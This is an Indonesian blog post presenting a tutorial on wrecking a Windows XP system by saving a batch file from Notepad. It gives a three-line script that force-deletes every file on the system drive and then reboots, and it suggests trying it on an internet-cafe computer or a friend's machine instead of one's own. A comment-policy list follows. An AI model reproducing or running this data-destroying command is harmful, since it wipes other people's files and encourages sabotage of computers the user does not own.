Cara Merusak Sistem Windows XP Dengan Notepad !


hallo nama gw rio... kali ini gw mau sharing tentang cara merusak sistem win xp .. ini bukan hal baru sih... udah lama banget gw tau,,, buat yang belum tau aja bagi yang udah tau silahkan komentar

 yuk simak!

Saran:

Jangan Coba Di Komputer Pribadi 

sebenernya cara ini sangatlah mudah cuma hanya membuka notepad dan tuliskan codenya anda bisa merusak sistemnya

Tutorial : 

1. buka notepad copy paste code ini

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2. simpan dengan extensi .bat

Cara menggunakannya cukup dengan Double-click pada file yang sudah lo buat tadi, dan jangan heran kalo komputer/laptop kalian akan mati dan gue juga kurang tau bagaimana cara mengatasi windows xp yang sudah dirusak oleh notepad ber-script ini mending lu coba di warnet atau kompi temen lu :P



Jalan Terakhir Hanyalah Instal Ulang Komputer Sudah Gw Saranin Jangan Pakai Komputer Pribadi




gw ga bertanggu jawab apabila ada kerusakan kompi / laptop anda

Semoga Bermanfaat :))
Previous
Next Post »

PERATURAN BERKOMENTAR :

1. Dilarang Menaruh Link Aktif (Live Link)
2. Komentar Dilarang Mengandung Unsur Sara / Por*o
3. Setidaknya Gunakan Name/URL daripada Anonim (Pengguna Tanpa Nama)
4. Jika Komentar Relevan Kami bisa Menghargai Komentar Anda
5. Dilarang Spam Out Of Topic Show Konversi KodeHide Konversi Kode Show EmoticonHide Emoticon

Thanks for your comment